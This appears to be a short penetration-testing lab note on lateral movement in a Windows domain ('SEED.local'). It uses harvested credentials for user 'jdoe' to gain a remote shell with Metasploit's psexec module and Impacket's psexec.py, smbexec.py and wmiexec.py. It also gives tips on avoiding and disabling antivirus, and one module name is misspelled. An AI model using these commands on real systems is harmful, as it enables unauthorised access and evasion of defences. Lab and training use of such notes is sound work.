Previously we found the credentials for the user jdoe. Now we’re gonna use them to gain a shell on a machine.
Psexec is noisy with antivirus, should start with smbexec or wmiexec. Also try with half shell to disable antivirus and use more robust shell.
msfconsole
use windows/smb/psexex # exist for powershell "psexec_psh"
options # set options
show targets # set target if automatic target doesn't work
run # may need multiple run
psexec.py SEED.local/jdoe:[email protected]
smbexec.py SEED.local/jdoe:[email protected]
wmiexec.py SEED.local/jdoe:[email protected]